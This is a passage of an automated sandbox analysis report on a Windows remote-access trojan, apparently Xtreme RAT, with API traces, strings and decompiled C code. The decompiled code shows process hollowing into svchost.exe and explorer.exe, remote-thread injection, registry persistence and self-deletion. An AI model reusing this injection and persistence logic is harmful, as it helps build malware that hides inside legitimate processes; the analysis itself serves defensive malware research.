TerminateProcess.KERNEL32(?,00000000,00000000,00000000,00000000,00C8F38C,000001F4,?,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000), ref: 00C8A5D5

Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(user32.dll), ref: 00C88BE5
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(urlmon.dll), ref: 00C88BEF
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(wininet.dll), ref: 00C88BF9
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C88C03
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(Shell32.dll), ref: 00C88C0D
Part of subcall function 00C88BC0: GetLastError.KERNEL32(00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000,00000000), ref: 00C88C25
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000), ref: 00C88C33
Part of subcall function 00C88BC0: Sleep.KERNEL32(0000000A,00000000), ref: 00C88DBC
Part of subcall function 00C88BC0: CloseHandle.KERNEL32(?), ref: 00C88DD4
Part of subcall function 00C88BC0: CloseHandle.KERNEL32(?), ref: 00C88DDD
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,?,?,0000000A,00000000), ref: 00C88DFF
Part of subcall function 00C88BC0: ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C88E18
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,00000000,open,?,00000000,00000000,00000000,?,?,0000000A,00000000), ref: 00C88E1F

Sleep.KERNEL32(000001F4,?,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000,00000000), ref: 00C8A522
TerminateProcess.KERNEL32(?,00000000,000001F4,?,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000), ref: 00C8A53E
GetLastError.KERNEL32(00000000,00000000,00C8F38C,000001F4,?,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C), ref: 00C8A568
CloseHandle.KERNEL32(00000000), ref: 00C8A576
TerminateProcess.KERNEL32(?,00000000,00000000,00000000,00000000,00C8F38C,000001F4,?,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000), ref: 00C8A58D
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C8A600

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Part of subcall function 00C87B84: SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C1D
Part of subcall function 00C87B84: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C87C37
Part of subcall function 00C87B84: GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C4A
Part of subcall function 00C87B84: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000080,00000000), ref: 00C87C6C
Part of subcall function 00C87B84: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000), ref: 00C87C7D
Part of subcall function 00C87B84: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C87C95
Part of subcall function 00C87B84: DeleteFileW.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,00000000,80000000,00000001), ref: 00C87CEE
Part of subcall function 00C87B84: CloseHandle.KERNEL32(00000000), ref: 00C87D0F

Part of subcall function 00C83420: VirtualAlloc.KERNEL32(00000000,00000104,00001000,00000004,00000000,00C83498,?,?,?,?,?,00C89C1F,00000064,00008007,00000000,00C8A62B), ref: 00C83450
Part of subcall function 00C83420: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000104,00001000,00000004,00000000,00C83498,?,?,?,?,?,00C89C1F,00000064), ref: 00C83463
Part of subcall function 00C83420: GetCommandLineW.KERNEL32(00000000,00C83498,?,?,?,?,?,00C89C1F,00000064,00008007,00000000,00C8A62B), ref: 00C8346A

Part of subcall function 00C83A54: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C83A65
Part of subcall function 00C83A54: Process32FirstW.KERNEL32(00000000,?), ref: 00C83A7A
Part of subcall function 00C83A54: CharUpperW.USER32(?), ref: 00C83A94
Part of subcall function 00C83A54: CharUpperW.USER32(00000000), ref: 00C83AA4
Part of subcall function 00C83A54: CharUpperW.USER32(?), ref: 00C83ABF
Part of subcall function 00C83A54: CharUpperW.USER32(?), ref: 00C83ACA
Part of subcall function 00C83A54: Process32NextW.KERNEL32(00000000,?), ref: 00C83AEC
Part of subcall function 00C83A54: CloseHandle.KERNEL32(00000000), ref: 00C83AF6

Strings

Mutex, xrefs: 00C8A489
Software\Microsoft\Active Setup\Installed Components\, xrefs: 00C8A11C
SOFTWARE\, xrefs: 00C8A472
.xtr, xrefs: 00C8A3C2
explorer.exe, xrefs: 00C8A383
local, xrefs: 00C8A3EF
svchost.exe, xrefs: 00C8A196
InstalledServer, xrefs: 00C8A0D9
SOFTWARE\, xrefs: 00C8A0CD
XTREME, xrefs: 00C8A42F

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C8A0A2, Relevance: 33.5, APIs: 9, Strings: 10, Instructions: 222
sleep

C-Code - Quality: 97%

			E00C8A0A2(void* __edx, void* __eflags) {
				intOrPtr _t56;
				intOrPtr* _t57;
				intOrPtr _t59;
				intOrPtr* _t60;
				void* _t67;
				long _t68;
				int* _t79;
				int* _t84;
				int* _t90;
				intOrPtr* _t103;
				intOrPtr* _t117;
				void* _t140;
				WCHAR* _t153;
				signed int _t170;
				intOrPtr _t204;
				intOrPtr _t206;
				intOrPtr* _t210;
				intOrPtr _t214;
				intOrPtr* _t216;
				WCHAR* _t240;
				void* _t243;
				void* _t244;
				void* _t247;
				void* _t249;

				_t247 = __eflags;
				E00C814F0();
				E00C83674( *0xc8f898);
				E00C83674(E00C836D8( *0xc8f898, _t247));
				E00C82F90(0x80000001, E00C833A8(L"SOFTWARE\\", 0xc8f38c, _t247), _t247, 2,  *0xc8f898); // executed
				memcpy(0xc8fccc, 0xc8e07c, 0x607 << 2);
				_t240 = 0xc8ec8a;
				E00C82E48( *0xc8f898);
				E00C82914(0xc914e8,  *0xc8f898);
				E00C82E48(E00C833A8(L"Software\\Microsoft\\Active Setup\\Installed Components\\", 0xc8f302, _t247));
				E00C82914(0xc91b06, _t30);
				_t170 = E00C836D8( *0xc8f898, _t247);
				E00C82E48(_t170);
				E00C82914(0xc916f2, _t170);
				if( *0xc8f38a == 1) {
					_t153 = E00C8263C(0, 0, 0xc8f3da); // executed
					_t240 = _t153;
					_t249 = GetLastError() - 0xb7;
					if(_t249 == 0) {
						CloseHandle(_t240);
					} else {
						CloseHandle(_t240);
						 *0xc8f89c = E00C833A8(L"svchost.exe", 0xc8a704, _t249);
						E00C8291C();
						E00C82E48( *0xc8f89c);
						E00C82914(0xc8fac0,  *0xc8f89c);
						 *0xc8f8ac = E00C83EA8(0xc8fac0, 0xc91f1c, _t244);
						E00C83CE4( *0xc8f8ac, 0xc8fccc, E00C88EF8);
					}
				}
				E00C81CD8(_t244 - 0x1838, 0x11, 0xc8f2b2);
				_t204 =  *0xc8b0dc; // 0x2ad9cc
				E00C81DBC( *((intOrPtr*)(_t244 - 0x1838)), _t204);
				if(_t249 != 0) {
					E00C81CD8(_t244 - 0x183c, 0x11, 0xc8f2b2);
					_t206 =  *0xc8b0d8; // 0x2a7934
					E00C81DBC( *((intOrPtr*)(_t244 - 0x183c)), _t206);
					if(__eflags != 0) {
						 *0xc8f89c = E00C833A8(0xc8f2b2, 0xc8a704, __eflags);
						 *0xc8f8ac = E00C83EA8( *0xc8f89c, 0xc91f1c, _t244);
						__eflags =  *0xc8f8ac;
						if(__eflags == 0) {
							_t140 = E00C83A54( *0xc8f89c, 0xc8f8ac);
							__eflags = _t140;
							if(_t140 != 0) {
								 *0xc8f89c = E00C83B10( *0xc8f8ac);
							} else {
								 *0xc8f89c = E00C83094();
							}
							 *0xc8f8ac = E00C83EA8( *0xc8f89c, 0xc91f1c, _t244);
							__eflags =  *0xc8f8ac;
							if(__eflags == 0) {
								 *0xc8f89c = E00C83094();
								 *0xc8f8ac = E00C83EA8( *0xc8f89c, 0xc91f1c, _t244);
							}
						}
					} else {
						 *0xc8f89c = E00C83094();
						 *0xc8f8ac = E00C83EA8( *0xc8f89c, 0xc91f1c, _t244);
					}
				} else {
					 *0xc8f8ac = 0;
				}
				_t243 = 0;
				 *0xc8f8a8 = 0;
				_t250 =  *0xc8f2b0;
				if( *0xc8f2b0 != 0) {
					_t170 =  *0xc8f898;
					_t240 = E00C833A8(E00C83420(0, _t170, 0), 0xc8a704, _t250);
					if(E00C83960(_t170, E00C82E48(_t170), _t240) == 0) {
						SetFileAttributesW(_t240, 0x80);
						_t252 = E00C82E48(_t240) + _t132;
						E00C82914(0xc91d10, _t240);
						E00C83CE4(E00C83EA8(E00C833A8(L"explorer.exe", 0xc8a704, E00C82E48(_t240) + _t132), 0xc91f1c, _t244), 0xc91d10, E00C897F4);
					}
				}
				_t56 = E00C833A8(E00C836D8(0xc918fc, _t252), 0xc90fdc, _t252);
				_t210 =  *0xc8b0f0; // 0xc8e01c
				 *_t210 = _t56;
				_t57 =  *0xc8b0f0; // 0xc8e01c
				_t59 = E00C833A8( *_t57, L".xtr", _t252);
				_t212 =  *0xc8b0f0; // 0xc8e01c
				 *_t212 = _t59;
				_t60 =  *0xc8b0f0; // 0xc8e01c
				if(E00C835B0( *_t60) != 0 && E00C87B84(L"local", _t170, _t243) == 1) {
					_t255 =  *0xc8f8ac;
					if( *0xc8f8ac == 0) {
						GetModuleFileNameW(0, 0xc8fac0, 0x20a);
						 *0xc8f8ac = E00C83EA8(0xc8fac0, 0xc91f1c, _t244);
					}
					_t216 =  *0xc8b0e4; // 0xc8e024
					_t103 =  *0xc8b0e8; // 0xc8e020
					E00C82B90( *_t103, _t170, L"XTREME",  *_t216 - 0x1e, _t240, _t243, _t255);
					E00C82E14(_t244 - 0x1844, L"XTREME", 0, GetCurrentProcessId(), 0);
					E00C81D10(_t244 - 0x1840,  *((intOrPtr*)(_t244 - 0x1844)), L"SOFTWARE\\", _t255);
					E00C82F90(0x80000001, E00C81CF4( *((intOrPtr*)(_t244 - 0x1840))), _t255, 2, 0xc90fdc);
					CloseHandle( *0xc8f8b0);
					_t117 =  *0xc8b0e8; // 0xc8e020
					_t212 = 0;
					E00C84600( *_t117, 0xc8f8ac, 0, 0, 0xc91f1c);
					Sleep(0x3e8);
					ExitProcess(0);
				}
				_t257 =  *0xc8f8ac;
				if( *0xc8f8ac != 0) {
					CloseHandle( *0xc8f8b0);
					while(1) {
						_t213 = E00C88BC0;
						 *0xc8f8a8 = E00C83CE4( *0xc8f8ac, 0xc8fccc, E00C88BC0);
						Sleep(0x1f4); // executed
						__eflags =  *0xc8f8a8;
						if( *0xc8f8a8 == 0) {
							_t90 =  *0xc8b0e0; // 0xc8b000
							TerminateProcess( *0xc8f8ac,  *_t90);
							_t213 = 0xc91f1c;
							 *0xc8f8ac = E00C83EA8( *0xc8f89c, 0xc91f1c, _t244);
						}
						_t243 = _t243 + 1;
						_t67 = E00C8263C(0, 0, 0xc8f38c); // executed
						_t241 = _t67;
						_t68 = GetLastError();
						__eflags = _t68 - 0xb7;
						_t170 = _t170 & 0xffffff00 | _t68 == 0x000000b7;
						CloseHandle(_t67);
						__eflags = _t170;
						if(_t170 == 0) {
							_t84 =  *0xc8b0e0; // 0xc8b000
							TerminateProcess( *0xc8f8ac,  *_t84);
							_t213 = 0xc91f1c;
							 *0xc8f8ac = E00C83EA8( *0xc8f89c, 0xc91f1c, _t244);
						}
						__eflags = _t243 - 7;
						if(_t243 >= 7) {
							break;
						}
						__eflags = _t170 - 1;
						if(_t170 != 1) {
							continue;
						}
						break;
					}
					E00C840F8(0xc8e07c, _t170, _t213, _t241, _t243); // executed
					__eflags =  *0xc8f8a8;
					if(__eflags == 0) {
						_t79 =  *0xc8b0e0; // 0xc8b000
						TerminateProcess( *0xc8f8ac,  *_t79);
						E00C88BC0(_t170, _t241, _t243, __eflags, 0xc8fccc);
					}
					__eflags = _t243 - 7;
					if(_t243 >= 7) {
						__eflags = _t170;
						if(_t170 == 0) {
							ShellExecuteW(0, L"open",  *0xc8f898, 0, 0, 0);
						}
					}
					goto L38;
				} else {
					CloseHandle( *0xc8f8b0);
					E00C840F8(0xc8e07c, _t170, _t212, _t240, _t243);
					E00C88BC0(_t170, _t240, _t243, _t257, 0xc8fccc);
					L38:
					_pop(_t214);
					 *[fs:eax] = _t214;
					_push(0xc8a632);
					E00C81B90(_t244 - 0x1844, 5);
					return E00C81B78(_t244 - 0x14);
				}
			}

0x00c8a0a2
0x00c8a0a2
0x00c8a0ac
0x00c8a0bb
0x00c8a0e3
0x00c8a0f7
0x00c8a0f7
0x00c8a0fe
0x00c8a112
0x00c8a12a
0x00c8a13a
0x00c8a149
0x00c8a14d
0x00c8a15d
0x00c8a169
0x00c8a178
0x00c8a17d
0x00c8a184
0x00c8a189
0x00c8a1fd
0x00c8a18b
0x00c8a18c
0x00c8a1a0
0x00c8a1af
0x00c8a1b9
0x00c8a1cd
0x00c8a1e1
0x00c8a1f5
0x00c8a1f5
0x00c8a189
0x00c8a212
0x00c8a21d
0x00c8a223
0x00c8a228
0x00c8a246
0x00c8a251
0x00c8a257
0x00c8a25c
0x00c8a290
0x00c8a2a4
0x00c8a2a9
0x00c8a2b0
0x00c8a2bc
0x00c8a2c1
0x00c8a2c3
0x00c8a2db
0x00c8a2c5
0x00c8a2ca
0x00c8a2ca
0x00c8a2ef
0x00c8a2f4
0x00c8a2fb
0x00c8a302
0x00c8a316
0x00c8a316
0x00c8a2fb
0x00c8a25e
0x00c8a263
0x00c8a277
0x00c8a277
0x00c8a22a
0x00c8a22c
0x00c8a22c
0x00c8a31b
0x00c8a31f
0x00c8a324
0x00c8a32b
0x00c8a32d
0x00c8a344
0x00c8a35a
0x00c8a362
0x00c8a370
0x00c8a379
0x00c8a3a1
0x00c8a3a1
0x00c8a35a
0x00c8a3b5
0x00c8a3ba
0x00c8a3c0
0x00c8a3c7
0x00c8a3ce
0x00c8a3d3
0x00c8a3d9
0x00c8a3db
0x00c8a3e9
0x00c8a401
0x00c8a408
0x00c8a416
0x00c8a42a
0x00c8a42a
0x00c8a434
0x00c8a43f
0x00c8a446
0x00c8a461
0x00c8a477
0x00c8a493
0x00c8a49e
0x00c8a4ad
0x00c8a4b4
0x00c8a4b6
0x00c8a4c0
0x00c8a4c7
0x00c8a4c7
0x00c8a4cc
0x00c8a4d3
0x00c8a4ff
0x00c8a504
0x00c8a509
0x00c8a518
0x00c8a522
0x00c8a527
0x00c8a52e
0x00c8a530
0x00c8a53e
0x00c8a543
0x00c8a552
0x00c8a552
0x00c8a557
0x00c8a561
0x00c8a566
0x00c8a568
0x00c8a56d
0x00c8a572
0x00c8a576
0x00c8a57b
0x00c8a57d
0x00c8a57f
0x00c8a58d
0x00c8a592
0x00c8a5a1
0x00c8a5a1
0x00c8a5a6
0x00c8a5a9
0x00000000
0x00000000
0x00c8a5ab
0x00c8a5ae
0x00000000
0x00000000
0x00000000
0x00c8a5ae
0x00c8a5b9
0x00c8a5be
0x00c8a5c5
0x00c8a5c7
0x00c8a5d5
0x00c8a5df
0x00c8a5df
0x00c8a5e4
0x00c8a5e7
0x00c8a5e9
0x00c8a5eb
0x00c8a600
0x00c8a600
0x00c8a5eb
0x00000000
0x00c8a4d5
0x00c8a4db
0x00c8a4e5
0x00c8a4ef
0x00c8a605
0x00c8a607
0x00c8a60a
0x00c8a60d
0x00c8a61d
0x00c8a62a
0x00c8a62a

APIs

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000), ref: 00C83721
Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000), ref: 00C83775

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Part of subcall function 00C82F90: RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 00C82FA4
Part of subcall function 00C82F90: RegSetValueExW.ADVAPI32(?,ServerStarted,00000000,?,?,00000000,00C8E07C,?,00000000,ServerStarted,?,00C89F0A,00000002,00C8F8B4,00000000,00000000), ref: 00C82FBF
Part of subcall function 00C82F90: RegCloseKey.ADVAPI32(?,?,ServerStarted,00000000,?,?,00000000,00C8E07C,?,00000000,ServerStarted,?,00C89F0A,00000002,00C8F8B4,00000000), ref: 00C82FCE

Part of subcall function 00C83B10: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00C83B23
Part of subcall function 00C83B10: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,?), ref: 00C83B4D
Part of subcall function 00C83B10: GetModuleFileNameExW.PSAPI(?,00000000,?,00000104,00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,?), ref: 00C83B64
Part of subcall function 00C83B10: CloseHandle.KERNEL32(?), ref: 00C83B85

Part of subcall function 00C83094: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00C830BA
Part of subcall function 00C83094: CloseHandle.KERNEL32(00000000), ref: 00C830C0
Part of subcall function 00C83094: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302,00000002), ref: 00C830D3
Part of subcall function 00C83094: FindExecutableW.SHELL32(00000000,00000000,00000000), ref: 00C830DE
Part of subcall function 00C83094: DeleteFileW.KERNEL32(00000000,00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302), ref: 00C830E4

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

GetLastError.KERNEL32(00000000,00000000,00C8F3DA,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000), ref: 00C8A17F
CloseHandle.KERNEL32(00000000), ref: 00C8A18C
CloseHandle.KERNEL32(00000000), ref: 00C8A1FD

Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

SetFileAttributesW.KERNEL32(00000000,00000080,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000,00000000), ref: 00C8A362
CloseHandle.KERNEL32(?), ref: 00C8A4FF

Part of subcall function 00C83CE4: GetModuleHandleA.KERNEL32(00000000), ref: 00C83CFC
Part of subcall function 00C83CE4: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00C83D26
Part of subcall function 00C83CE4: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,00000000,00008000), ref: 00C83D35
Part of subcall function 00C83CE4: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,00003000,00000040,?,?,00000000,00008000), ref: 00C83D48
Part of subcall function 00C83CE4: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,00000000,00008000), ref: 00C83D50
Part of subcall function 00C83CE4: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000000,?), ref: 00C83D71
Part of subcall function 00C83CE4: CloseHandle.KERNEL32(?), ref: 00C83D77

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

GetModuleFileNameW.KERNEL32(00000000,00C8FAC0,0000020A,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000), ref: 00C8A416

Part of subcall function 00C83EA8: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83ED5
Part of subcall function 00C83EA8: TerminateProcess.KERNEL32(00000000,00000000), ref: 00C83EFA
Part of subcall function 00C83EA8: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83F3B
Part of subcall function 00C83EA8: Sleep.KERNEL32(00000064), ref: 00C83F64

GetCurrentProcessId.KERNEL32(00000002,00C90FDC,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000,00000000), ref: 00C8A452
CloseHandle.KERNEL32(?), ref: 00C8A49E

Part of subcall function 00C84600: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C846D4
Part of subcall function 00C84600: Sleep.KERNEL32(000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,00C848A9,?,00C8FCCC,00000000), ref: 00C846F4
Part of subcall function 00C84600: GetThreadContext.KERNEL32(?,?), ref: 00C84707
Part of subcall function 00C84600: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C84727
Part of subcall function 00C84600: NtUnmapViewOfSection.NTDLL(?,?), ref: 00C84737
Part of subcall function 00C84600: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000), ref: 00C84758
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,00000000,?,?,?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8), ref: 00C84777
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,?), ref: 00C84809
Part of subcall function 00C84600: VirtualProtectEx.KERNEL32(?,?,?,00000040,?,?,?,?), ref: 00C8482C
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004,?), ref: 00C84854
Part of subcall function 00C84600: SetThreadContext.KERNEL32(?,?), ref: 00C84885
Part of subcall function 00C84600: ResumeThread.KERNEL32(?,?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004), ref: 00C8489A

Sleep.KERNEL32(000003E8,00C91F1C,?,00000000,00000000,00000002,00C90FDC,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000), ref: 00C8A4C0
ExitProcess.KERNEL32(00000000,000003E8,00C91F1C,?,00000000,00000000,00000002,00C90FDC,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000), ref: 00C8A4C7
CloseHandle.KERNEL32(?), ref: 00C8A4DB

Part of subcall function 00C840F8: DeleteFileW.KERNEL32(00000000,00000004,00000000,00000002,00000000,00000002,00000000,?,00000000,00C8453A,?,00000000,00000001,00000000,00000351,00000000), ref: 00C84496
Part of subcall function 00C840F8: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00C844E1
Part of subcall function 00C840F8: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00C844FA

TerminateProcess.KERNEL32(?,00000000,00000000,00000000,00000000,00C8F38C,000001F4,?,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000), ref: 00C8A5D5

Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(user32.dll), ref: 00C88BE5
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(urlmon.dll), ref: 00C88BEF
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(wininet.dll), ref: 00C88BF9
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C88C03
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(Shell32.dll), ref: 00C88C0D
Part of subcall function 00C88BC0: GetLastError.KERNEL32(00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000,00000000), ref: 00C88C25
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000), ref: 00C88C33
Part of subcall function 00C88BC0: Sleep.KERNEL32(0000000A,00000000), ref: 00C88DBC
Part of subcall function 00C88BC0: CloseHandle.KERNEL32(?), ref: 00C88DD4
Part of subcall function 00C88BC0: CloseHandle.KERNEL32(?), ref: 00C88DDD
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,?,?,0000000A,00000000), ref: 00C88DFF
Part of subcall function 00C88BC0: ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C88E18
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,00000000,open,?,00000000,00000000,00000000,?,?,0000000A,00000000), ref: 00C88E1F

Sleep.KERNEL32(000001F4,?,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000,00000000), ref: 00C8A522
TerminateProcess.KERNEL32(?,00000000,000001F4,?,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000), ref: 00C8A53E
GetLastError.KERNEL32(00000000,00000000,00C8F38C,000001F4,?,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C), ref: 00C8A568
CloseHandle.KERNEL32(00000000), ref: 00C8A576
TerminateProcess.KERNEL32(?,00000000,00000000,00000000,00000000,00C8F38C,000001F4,?,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000), ref: 00C8A58D
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C8A600

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Part of subcall function 00C87B84: SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C1D
Part of subcall function 00C87B84: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C87C37
Part of subcall function 00C87B84: GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C4A
Part of subcall function 00C87B84: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000080,00000000), ref: 00C87C6C
Part of subcall function 00C87B84: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000), ref: 00C87C7D
Part of subcall function 00C87B84: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C87C95
Part of subcall function 00C87B84: DeleteFileW.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,00000000,80000000,00000001), ref: 00C87CEE
Part of subcall function 00C87B84: CloseHandle.KERNEL32(00000000), ref: 00C87D0F

Part of subcall function 00C83420: VirtualAlloc.KERNEL32(00000000,00000104,00001000,00000004,00000000,00C83498,?,?,?,?,?,00C89C1F,00000064,00008007,00000000,00C8A62B), ref: 00C83450
Part of subcall function 00C83420: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000104,00001000,00000004,00000000,00C83498,?,?,?,?,?,00C89C1F,00000064), ref: 00C83463
